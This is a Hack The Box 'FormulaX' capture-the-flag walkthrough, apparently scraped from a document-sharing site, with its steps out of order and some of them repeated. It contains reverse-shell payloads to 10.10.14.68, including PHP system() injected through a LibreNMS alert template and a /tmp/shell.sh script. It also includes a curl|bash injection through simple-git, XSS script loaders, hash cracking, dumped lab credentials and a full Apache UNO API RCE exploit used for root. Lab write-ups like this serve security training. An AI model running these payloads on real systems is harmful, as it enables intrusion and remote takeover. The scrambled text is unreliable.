tcp 0 0 127.0.0.1:45848 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45984 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40656 127.0.0.1:8082 TIME_WAIT
tcp 0 0 10.10.11.6:55966 10.10.14.68:5550 ESTABLISHED
tcp 0 0 127.0.0.1:41684 127.0.0.1:3000 ESTABLISHED
tcp 0 0 127.0.0.1:45962 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55118 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43600 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51302 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45780 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55246 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55094 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43460 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55292 TIME_WAIT
tcp 0 0 127.0.0.1:40430 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55058 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43656 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51114 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:45774 TIME_WAIT
tcp 0 0 127.0.0.1:43560 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:48454 127.0.0.1:27017 TIME_WAIT
tcp 0 0 127.0.0.1:55652 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51300 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:43592 TIME_WAIT
tcp 0 0 127.0.0.1:43476 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:43742 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:43454 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:40452 TIME_WAIT
tcp 0 0 127.0.0.1:55044 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55738 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40688 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40484 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55226 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40500 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51230 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:46610 127.0.0.1:27017 ESTABLISHED
tcp 0 0 127.0.0.1:40644 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:56254 127.0.0.1:27017 ESTABLISHED
tcp 0 0 127.0.0.1:43698 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51214 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40530 127.0.0.1:8082 TIME_WAIT
HTB_FormulaX 20
tcp 0 0 127.0.0.1:40708 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51074 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:56244 127.0.0.1:27017 ESTABLISHED
tcp 0 0 127.0.0.1:45824 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55882 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43508 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55860 TIME_WAIT
tcp 0 0 127.0.0.1:55150 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55750 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:27017 127.0.0.1:59512 ESTABLISHED
tcp 0 0 127.0.0.1:40672 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43750 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55646 TIME_WAIT
tcp 0 0 127.0.0.1:43556 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43610 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40452 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55628 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:43784 TIME_WAIT
tcp 0 0 127.0.0.1:57480 127.0.0.1:37191 ESTABLISHED
tcp 0 0 127.0.0.1:40438 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:46048 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40582 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55260 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51096 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40698 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51112 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55268 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43770 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:36134 127.0.0.1:80 ESTABLISHED
tcp 0 0 127.0.0.1:8082 127.0.0.1:55828 TIME_WAIT
tcp 0 0 127.0.0.1:45926 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:46030 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55280 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45992 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55080 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:36849 127.0.0.1:48886 TIME_WAIT
tcp 0 0 127.0.0.1:51172 127.0.0.1:8082 TIME_WAIT
tcp6 0 0 :::22 :::* LISTEN
netstat: no support for ÀF INET (sctp)' on this system.
netstat: no support for ÀF INET (sctp)' on this system.
udp 0 0 10.10.11.6:54519 8.8.8.8:53 ESTABLISHED
udp 0 0 10.10.11.6:44675 8.8.8.8:53 ESTABLISHED
udp 0 0 127.0.0.53:53 0.0.0.0:*
udp 0 0 0.0.0.0:68 0.0.0.0:*
udp 0 0 0.0.0.0:162 0.0.0.0:*
udp 0 0 127.0.0.1:51518 127.0.0.53:53 ESTABLISHED
udp6 0 0 :::162 :::*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ] DGRAM 5858269 /run/user/1002/systemd/notif
HTB_FormulaX 21
y
unix 2 [ ACC ] STREAM LISTENING 5858272 /run/user/1002/systemd/priva
te
unix 2 [ ACC ] STREAM LISTENING 5858278 /run/user/1002/bus
unix 2 [ ACC ] STREAM LISTENING 5858280 /run/user/1002/gnupg/S.dirmn
gr
unix 2 [ ACC ] STREAM LISTENING 38360 /home/kai_relay/.pm2/pub.soc
k
unix 2 [ ACC ] STREAM LISTENING 5858282 /run/user/1002/gnupg/S.gpg-a
gent.browser
unix 2 [ ACC ] STREAM LISTENING 28358 @/org/kernel/linux/storage/m
ultipathd
gent.extra
gent.ssh
gent
unix 2 [ ACC ] STREAM LISTENING 38361 /home/kai_relay/.pm2/rpc.soc
k
unix 2 [ ACC ] STREAM LISTENING 34499 /tmp/mongodb-27017.sock
unix 3 [ ] DGRAM CONNECTED 28342 /run/systemd/notify
unix 2 [ ACC ] STREAM LISTENING 28345 /run/systemd/private
unix 2 [ ACC ] STREAM LISTENING 28347 /run/systemd/userdb/io.syste
md.DynamicUser
unix 2 [ ACC ] STREAM LISTENING 28348 /run/systemd/io.system.Manag
edOOM
unix 2 [ ACC ] STREAM LISTENING 28356 /run/lvm/lvmpolld.socket
unix 2 [ ACC ] STREAM LISTENING 28359 /run/systemd/fsck.progress
unix 10 [ ] DGRAM CONNECTED 28366 /run/systemd/journal/dev-log
unix 9 [ ] DGRAM CONNECTED 28368 /run/systemd/journal/socket
unix 2 [ ACC ] STREAM LISTENING 28370 /run/systemd/journal/stdout
unix 2 [ ACC ] SEQPACKET LISTENING 28373 /run/udev/control
unix 2 [ ACC ] STREAM LISTENING 33199 /run/php-fpm-librenms.sock
unix 2 [ ACC ] STREAM LISTENING 33201 /run/php/php8.1-fpm.sock
unix 2 [ ACC ] STREAM LISTENING 38357 /var/www/.pm2/pub.sock
unix 2 [ ACC ] STREAM LISTENING 33537 /run/mysqld/mysqld.sock
unix 2 [ ACC ] STREAM LISTENING 27522 /run/systemd/journal/io.syst
emd.journal
unix 3 [ ] SEQPACKET CONNECTED 39854 @0000f
unix 2 [ ACC ] STREAM LISTENING 38358 /var/www/.pm2/rpc.sock
unix 2 [ ACC ] STREAM LISTENING 32055 @ISCSIADM_ABSTRACT_NAMESPACE
unix 2 [ ACC ] STREAM LISTENING 30239 /run/systemd/resolve/io.syst
emd.Resolve
unix 2 [ ACC ] STREAM LISTENING 32043 /run/dbus/system_bus_socket
unix 2 [ ACC ] STREAM LISTENING 32056 /run/lxd-installer.socket
unix 2 [ ACC ] STREAM LISTENING 32288 /var/run/vmware/guestService
Pipe
unix 3 [ ] SEQPACKET CONNECTED 5866406 @00134
HTB_FormulaX 22
unix 3 [ ] STREAM CONNECTED 33083 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 5866440
unix 3 [ ] SEQPACKET CONNECTED 5866401
unix 2 [ ] DGRAM 34228
unix 2 [ ] DGRAM CONNECTED 39830
unix 3 [ ] STREAM CONNECTED 5866839 /run/dbus/system_bus_socket
HTB_FormulaX 23
HTB_FormulaX 24
unix 3 [ ] STREAM CONNECTED 5864974 /run/php-fpm-librenms.sock
HTB_FormulaX 25
HTB_FormulaX 26
unix 3 [ ] STREAM CONNECTED 5867521 /run/mysqld/mysqld.sock
netstat: no support for ÀF IPX' on this system.
HTB_FormulaX 27
netstat: no support for ÀF AX25' on this system.
netstat: no support for ÀF X25' on this system.
netstat: no support for ÀF NETROM' on this system.
netstat: no support for ÀF ROSE' on this system.
There is a port 3000 that looks suspicious. Let's check it out.
frank_dorky@formulax:~$ curl http://127.0.0.1:3000/

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="refresh" content="0;url='http://127.0.0.1:3000/login'" />
<title>Redirecting to http://127.0.0.1:3000/login</title>
</head>
<body>
Redirecting to <a href="http://127.0.0.1:3000/login">http://127.0.0.1:3000/logi
n</a>.
</body>
</html>
Login again via
ssh frank_dorky@chatbot.htb -L 3000:127.0.0.1:3000
Lets go to /opt/librenms and create a new user
frank_dorky@formulax:~$ cd /opt/librenms
frank_dorky@formulax:/opt/librenms$ ls -l adduser.php
-rwxr-xr-x 1 librenms librenms 956 Oct 18 2022 adduser.php
HTB_FormulaX 28
frank_dorky@formulax:/opt/librenms$ ./adduser.php test test 10
User test added successfully
Now login to the site via created credentials
We get to the control panel. So that we can create our own templates, we need to fix the
error in Webserver
To do this, make another entry 127.0.0.1 librenms.com in or Kalis hosts. and go to

http://librenms.com:3000
There are no errors, now we can create templates. Go to http://librenms.com:3000/templates

and click on Create new alert template
HTB_FormulaX 29
Enter php as given below
@php
system("bash -c '/bin/bash -i >& /dev/tcp/10.10.14.68/5550 0>&1'");
@endphp
HTB_FormulaX 30
We got a reverse connection
Upon listing the directory we got
librenms@formulax:~$ ls -la
total 5216
drwxrwx--x 27 librenms librenms 4096 Feb 19 13:33 .
drwxr-xr-x 3 root root 4096 Feb 16 15:21 ..
lrwxrwxrwx 1 root root 9 Feb 19 13:33 .bash_history -> /dev/null
drwxrwxr-x 4 librenms librenms 4096 Feb 16 15:21 .cache
-rw-r--r-- 1 librenms librenms 815 Oct 18 2022 .codeclimate.yml
drwxrwxr-x 3 librenms librenms 4096 Feb 16 15:21 .config
-rw-rw-r-- 1 librenms librenms 353 Sep 7 2023 .custom.env
HTB_FormulaX 31
-rw-r--r-- 1 librenms librenms 258 Oct 18 2022 .editorconfig
-rw-r--r-- 1 librenms librenms 73 Oct 18 2022 .env.example
-rw-r--r-- 1 librenms librenms 197 Oct 18 2022 .env.travis
-rw-r--r-- 1 librenms librenms 858 Oct 18 2022 .git-blame-ignore-revs
drwxr-xr-x 4 librenms librenms 4096 Oct 18 2022 .github
-rw-r--r-- 1 librenms librenms 637 Oct 18 2022 .gitignore
drwxrwxr-x 4 librenms librenms 4096 Feb 16 15:21 .local
-rw-r--r-- 1 librenms librenms 5434 Oct 18 2022 .php-cs-fixer.php
-rw------- 1 librenms librenms 1024 Feb 16 15:53 .rnd
-rw-r--r-- 1 librenms librenms 182 Oct 18 2022 .scrutinizer.yml
-rw-r--r-- 1 librenms librenms 103 Oct 18 2022 .styleci.yml
-rw-r--r-- 1 librenms librenms 11411 Oct 18 2022 AUTHORS.md
-rw-r--r-- 1 librenms librenms 94 Oct 18 2022 CHANGELOG.md
-rw-r--r-- 1 librenms librenms 93 Oct 18 2022 CODE_OF_CONDUCT.md
-rw-r--r-- 1 librenms librenms 170 Oct 18 2022 CONTRIBUTING.md
-rw-r--r-- 1 librenms librenms 35337 Oct 18 2022 LICENSE.txt
drwxr-xr-x 20 librenms librenms 4096 Feb 16 15:40 LibreNMS
-rw-r--r-- 1 librenms librenms 10040 Oct 18 2022 README.md
-rw-r--r-- 1 librenms librenms 1189 Oct 18 2022 SECURITY.md
-rwxr-xr-x 1 librenms librenms 7518 Oct 18 2022 addhost.php
-rwxr-xr-x 1 librenms librenms 956 Oct 18 2022 adduser.php
-rwxr-xr-x 1 librenms librenms 1827 Oct 18 2022 alerts.php
drwxr-xr-x 22 librenms librenms 4096 Oct 18 2022 app
-rwxr-xr-x 1 librenms librenms 1686 Oct 18 2022 artisan
-rwxr-xr-x 1 librenms librenms 6534 Oct 18 2022 billing-calculate.php
drwxr-xr-x 3 librenms librenms 4096 Feb 16 15:51 bootstrap
drwxr-xr-x 2 librenms librenms 4096 Oct 18 2022 cache
-rwxr-xr-x 1 librenms librenms 3334 Oct 18 2022 check-services.php
-rw-r--r-- 1 librenms librenms 5414 Oct 18 2022 composer.json
-rw-r--r-- 1 librenms librenms 457017 Oct 18 2022 composer.lock
-rwxr-xr-x 1 librenms librenms 2975214 Feb 16 15:21 composer.phar
drwxr-xr-x 2 librenms librenms 4096 Oct 18 2022 config
-rw-r--r-- 1 librenms librenms 1702 Oct 18 2022 config.php.default
-rwxr-xr-x 1 librenms librenms 368 Oct 18 2022 config_to_json.php
-rwxr-xr-x 1 librenms librenms 880 Oct 18 2022 cronic
-rw-r--r-- 1 librenms librenms 14640 Oct 18 2022 daily.php
-rwxr-xr-x 1 librenms librenms 14962 Oct 18 2022 daily.sh
drwxr-xr-x 6 librenms librenms 4096 Oct 18 2022 database
-rwxr-xr-x 1 librenms librenms 517 Oct 18 2022 delhost.php
-rwxr-xr-x 1 librenms librenms 1877 Oct 18 2022 discovery-wrapper.py
-rwxr-xr-x 1 librenms librenms 4206 Oct 18 2022 discovery.php
-rwxr-xr-x 1 librenms librenms 2211 Oct 18 2022 dist-pollers.php
drwxr-xr-x 11 librenms librenms 4096 Oct 18 2022 doc
drwxr-xr-x 9 librenms librenms 4096 Oct 18 2022 html
drwxr-xr-x 9 librenms librenms 4096 Oct 18 2022 includes
-rwxr-xr-x 1 librenms librenms 976 Oct 18 2022 irc.php
-rwxr-xr-x 1 librenms librenms 2067 Oct 18 2022 librenms-service.py
-rw-r--r-- 1 librenms librenms 580 Oct 18 2022 librenms.cron
-rw-r--r-- 1 librenms librenms 1055 Oct 18 2022 librenms.nonroot.cron
drwxr-xr-x 2 librenms librenms 4096 Oct 18 2022 licenses
HTB_FormulaX 32
-rwxr-xr-x 1 librenms librenms 1779 Oct 18 2022 lnms
drwxrwxr-x+ 2 librenms librenms 4096 Feb 16 15:21 logs
drwxr-xr-x 301 librenms librenms 20480 Oct 18 2022 mibs
drwxr-xr-x 2 librenms librenms 4096 Oct 18 2022 misc
-rw-r--r-- 1 librenms librenms 10210 Oct 18 2022 mkdocs.yml
-rw-r--r-- 1 librenms librenms 793386 Oct 18 2022 package-lock.json
-rw-r--r-- 1 librenms librenms 1341 Oct 18 2022 package.json
-rwxr-xr-x 1 librenms librenms 3841 Oct 18 2022 pbin.sh
-rw-r--r-- 1 librenms librenms 171565 Oct 18 2022 phpstan-baseline-deprecated.neon
-rw-r--r-- 1 librenms librenms 422134 Oct 18 2022 phpstan-baseline.neon
-rw-r--r-- 1 librenms librenms 537 Oct 18 2022 phpstan-deprecated.neon
-rw-r--r-- 1 librenms librenms 838 Oct 18 2022 phpstan.neon
-rw-r--r-- 1 librenms librenms 1515 Oct 18 2022 phpunit.xml
-rwxr-xr-x 1 librenms librenms 749 Oct 18 2022 ping.php
-rwxr-xr-x 1 librenms librenms 7322 Oct 18 2022 poll-billing.php
-rwxr-xr-x 1 librenms librenms 1872 Oct 18 2022 poller-wrapper.py
-rwxr-xr-x 1 librenms librenms 5568 Oct 18 2022 poller.php
-rwxr-xr-x 1 librenms librenms 1064 Oct 18 2022 renamehost.php
-rw-r--r-- 1 librenms librenms 87 Oct 18 2022 requirements.txt
drwxr-xr-x 7 librenms librenms 4096 Oct 18 2022 resources
drwxr-xr-x 2 librenms librenms 4096 Oct 18 2022 routes
drwxrwxr-x+ 2 librenms librenms 4096 Oct 18 2022 rrd
drwxr-xr-x 5 librenms librenms 4096 Oct 18 2022 scripts
-rw-r--r-- 1 librenms librenms 543 Oct 18 2022 server.php
-rwxr-xr-x 1 librenms librenms 1880 Oct 18 2022 services-wrapper.py
-rwxr-xr-x 1 librenms librenms 10194 Oct 18 2022 snmp-scan.py
-rw-r--r-- 1 librenms librenms 880 Oct 18 2022 snmpd.conf.example
-rwxr-xr-x 1 librenms librenms 538 Oct 18 2022 snmptrap.php
drwxr-xr-x 2 librenms librenms 12288 Oct 18 2022 sql-schema
drwxrwxr-x+ 6 librenms librenms 4096 Oct 18 2022 storage
-rwxr-xr-x 1 librenms librenms 523 Oct 18 2022 syslog.php
-rw-r--r-- 1 librenms librenms 776 Oct 18 2022 tailwind.config.js
drwxr-xr-x 10 librenms librenms 4096 Oct 18 2022 tests
-rwxr-xr-x 1 librenms librenms 5278 Oct 18 2022 validate.php
drwxrwxr-x 76 librenms librenms 4096 Feb 16 15:53 vendor
-rw-r--r-- 1 librenms librenms 709 Oct 18 2022 webpack.mix.js
Lets cat .custom.env
librenms@formulax:~$ cat .custom.env

APP_KEY=base64:jRoDTOFGZEO08+68w7EzYPp8a7KZCNk+4Fhh97lnCEk=
DB_HOST=localhost
DB_DATABASE=librenms
DB_USERNAME=kai_relay
DB_PASSWORD=mychemicalformulaX
#APP_URL=
NODE_ID=648b260eb18d2
VAPID_PUBLIC_KEY=BDhe6thQfwA7elEUvyMPh9CEtrWZM1ySaMMIaB10DsIhGeQ8Iks8kL6uLtjMsHe61-ZCC6
HTB_FormulaX 33
f6XgPVt7O6liSqpvg
VAPID_PRIVATE_KEY=chr9zlPVQT8NsYgDGeVFda-AiD0UWIY6OW-jStiwmTQ
In this way, I successfully obtained the kai_relay user and logged in directly via ssh.
kai_relay@formulax:~$ sudo -l
Matching Defaults entries for kai_relay on forumlax:
env_reset, timestamp_timeout=0, mail_badpass, secure_path=/usr/local/sbin\:/usr/loc
al/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, env_reset,
timestamp_timeout=0
User kai_relay may run the following commands on forumlax:

(ALL) NOPASSWD: /usr/bin/office.sh
When sudo -l was checked we can notice access to office. lets exploit it by following
script
"""
# Exploit Title: Apache UNO API RCE
# Date: 2018-09-18
# Exploit Author: sud0woodo
# Vendor Homepage: https://www.apache.org/
# Software Link: https://www.openoffice.org/api/
# Version:
LibreOffice Version: 6.1.2 / OpenOffice 4.1.6
(but really any version with the UNO API included)

# Tested on:
HTB_FormulaX 34
Ubuntu Mate 18.04 with kernel 4.15.0-34-generic (but works platform independent)
Proof of Concept code attached as .txt file.
HackDefense advisory:
https://hackdefense.com/blog/security-advisory-rce-in-apache-uno-api/
HackDefense blogpost:
https://hackdefense.com/blog/finding-RCE-capabilities-in-the-apache-uno-api/
Unauthenticated RCE LibreOffice/OpenOffice with UNO API
This code represents a small proof of concept of an unauthenticted remote code executio
n using
the Apache OpenOffice UNO API (https://www.openoffice.org/udk/). This code has been tes
ted
against LibreOffice Version: 6.1.1.2 on a Ubuntu Mate 18.04 with kernel 4.15.0-34-gener
ic.
For this PoC to work the target machine needs to run the ServiceManager using an extern
al
interface. The following command was used to test this PoC:
[Ubuntu]
Open a terminal and execute the following command:
soffice --accept='socket,host=0.0.0.0,port=2002;urp;StarOffice.Service'
The above command will start the LibreOffice ServiceManager but this can be executed wi
th the --invisible
flag to prevent the dialogbox from popping up on the target.
I also made a scanner available that can be used to check for the presence of the StarO
ffice manager running on a machine:
https://sud0woodo.sh/2019/03/06/building-a-go-scanner-to-search-externally-reachable-st
aroffice-managers/
"""
import uno
from com.sun.star.system import XSystemShellExecute
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--host', help='host to connect to', dest='host', required=True)
parser.add_argument('--port', help='port to connect to', dest='port', required=True)
args = parser.parse_args()
# Define the UNO component
localContext = uno.getComponentContext()
HTB_FormulaX 35
# Define the resolver to use, this is used to connect with the API
resolver = localContext.ServiceManager.createInstanceWithContext(
"com.sun.star.bridge.UnoUrlResolver", localContext )
# Connect with the provided host on the provided target port

print("[+] Connecting to target...")
context = resolver.resolve(
"uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host,arg
s.port))
# Issue the service manager to spawn the SystemShellExecute module and execute calc.exe
service_manager = context.ServiceManager
print("[+] Connected to {0}".format(args.host))
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecut
e")
shell_execute.execute("calc.exe", '',1)
Create a file /tmp/shell.sh with our reverse shell
#!/bin/bash
sh -i >& /dev/tcp/10.10.14.68/4444 0>&1
Don't forget to make it executable
chmod +x /tmp/shell.sh
Now open another ssh terminal for kai_relay@formulax and execute the following code
soffice --calc --accept="socket,host=localhost,port=2002;urp;" --norestore --nologo --n

odefault --headless
Now come back to the kai_relay@formulax terminal create python file called exp.py
# Exploit Title: Apache UNO API RCE

# Date: 2018-09-18
# Exploit Author: sud0woodo
# Vendor Homepage: https://www.apache.org/
# Software Link: https://www.openoffice.org/api/
# Version:
#LibreOffice Version: 6.1.2 / OpenOffice 4.1.6

#
#(but really any version with the UNO API included)
# Tested on:
#
#Ubuntu Mate 18.04 with kernel 4.15.0-34-generic (but works platform independent)
#
#Proof of Concept code attached as .txt file.
HTB_FormulaX 36
#
#HackDefense advisory:
#https://hackdefense.com/blog/security-advisory-rce-in-apache-uno-api/
#
#HackDefense blogpost:
#https://hackdefense.com/blog/finding-RCE-capabilities-in-the-apache-uno-api/
#
#Unauthenticated RCE LibreOffice/OpenOffice with UNO API
#
#This code represents a small proof of concept of an unauthenticted remote code executi
on using
#the Apache OpenOffice UNO API (https://www.openoffice.org/udk/). This code has been te
sted
#against LibreOffice Version: 6.1.1.2 on a Ubuntu Mate 18.04 with kernel 4.15.0-34-gene
ric.
#
#For this PoC to work the target machine needs to run the ServiceManager using an exter
nal
#interface. The following command was used to test this PoC:
#
#[Ubuntu]
#Open a terminal and execute the following command:
# soffice --accept='socket,host=0.0.0.0,port=2002;urp;StarOffice.Service'
#
#The above command will start the LibreOffice ServiceManager but this can be executed w
ith the --invisible
#flag to prevent the dialogbox from popping up on the target.
#
#I also made a scanner available that can be used to check for the presence of the Star
Office manager running on a machine:
#
#https://sud0woodo.sh/2019/03/06/building-a-go-scanner-to-search-externally-reachable-s
taroffice-managers/
import uno
from com.sun.star.system import XSystemShellExecute
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--host', help='host to connect to', dest='host', required=True)
parser.add_argument('--port', help='port to connect to', dest='port', required=True)
args = parser.parse_args()
# Define the UNO component
localContext = uno.getComponentContext()
# Define the resolver to use, this is used to connect with the API
resolver = localContext.ServiceManager.createInstanceWithContext(
"com.sun.star.bridge.UnoUrlResolver", localContext )
HTB_FormulaX 37
# Connect with the provided host on the provided target port
print("[+] Connecting to target...")
context = resolver.resolve(
"uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.hos
t,args.port))
# Issue the service manager to spawn the SystemShellExecute module and execute calc.exe
service_manager = context.ServiceManager
print("[+] Connected to {0}".format(args.host))
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecut
e")
shell_execute.execute("/tmp/shell.sh", '',1)
Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution
Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution.. remote
exploit for Multiple platform
https://www.exploit-db.com/exploits/46544
Now execute the following While creating listening to the port in our Kali
python3 exp.py --host 127.0.0.1 --port 2002
Finally, we got root access!!
🚩Root Access
Since we have successfully gained root access all we need to do is get the root flag.
HTB_FormulaX 38

HTB FormulaX

Uploaded by

Copyright:

Available Formats

HTB FormulaX

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

HTB FormulaX

Uploaded by

Copyright:

Available Formats

HTB_FormulaX

🍽️🍽️ Table of contents

Let's do a detailed analysis of the network using nmapAutomator

└─# nmapAutomator.sh -H formulax.htb -t All

Running all scans on formulax.htb with IP 3(NXDOMAIN)

No ping detected.. Will not use ping scans!

Host is likely running Unknown OS!

---------------------Starting Port Scan-----------------------

PORT STATE SERVICE

---------------------Starting Script Scan-----------------------

PORT STATE SERVICE VERSION

OS Detection modified to: Linux

---------------------Starting Full Scan------------------------

PORT STATE SERVICE

Making a script scan on extra ports: 4345

PORT STATE SERVICE VERSION

----------------------Starting UDP Scan------------------------

No UDP ports are open

---------------------Starting Vulns Scan-----------------------

Running CVE scan on all ports

Running Vuln scan on all ports

PORT STATE SERVICE VERSION

---------------------Finished all scans------------------------

Completed in 32 minute(s) and 40 second(s)

└─# dirsearch -u http://formulax.htb/restricted

Output File: /HTB/reports/http_formulax.htb/_restricted_24-03-16_00-16-57.txt

[00:16:57] Starting: restricted/

<img src=x >HTB_FormulaX 9 We seem to be able to upload files from our Kali to the Machine. 👣Foothold Since we can upload files into the machine via XSS , we can create a payload to exploit this.

const script = document.createElement('script');

<img src=x script1=document.createElement('script');script1.src='http://1

└─# php -S 0.0.0.0:5551

We got Base64 string and let's convert them.

Remote Code Execution (RCE) in simple-git | CVE-2022-25912 | Snyk

/bin/bash -i >& /dev/tcp/10.10.14.68/5550 0>&1

Now directly enter this command in the input box

ext::sh -c curl% http://10.10.14.68:5551/shell.sh|bash

Let's enter mongoDB directly to enter the database.

└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Now let's try to connect via shh connection.

And finally, I got the user flag.

There is a port 3000 that looks suspicious. Let's check it out.

frank_dorky@formulax:~$ curl http://127.0.0.1:3000/

Login again via

ssh frank_dorky@chatbot.htb -L 3000:127.0.0.1:3000

Lets go to /opt/librenms and create a new user

Now login to the site via created credentials

To do this, make another entry 127.0.0.1 librenms.com in or Kalis hosts. and go to

There are no errors, now we can create templates. Go to http://librenms.com:3000/templates

Upon listing the directory we got

Lets cat .custom.env

librenms@formulax:~$ cat .custom.env

User kai_relay may run the following commands on forumlax:

LibreOffice Version: 6.1.2 / OpenOffice 4.1.6

(but really any version with the UNO API included)

Proof of Concept code attached as .txt file.

Unauthenticated RCE LibreOffice/OpenOffice with UNO API

# Connect with the provided host on the provided target port

Create a file /tmp/shell.sh with our reverse shell

Don't forget to make it executable

<img src=x >
HTB_FormulaX 9
We seem to be able to upload files from our Kali to the Machine.
👣Foothold
Since we can upload files into the machine via XSS , we can create a payload to exploit
this.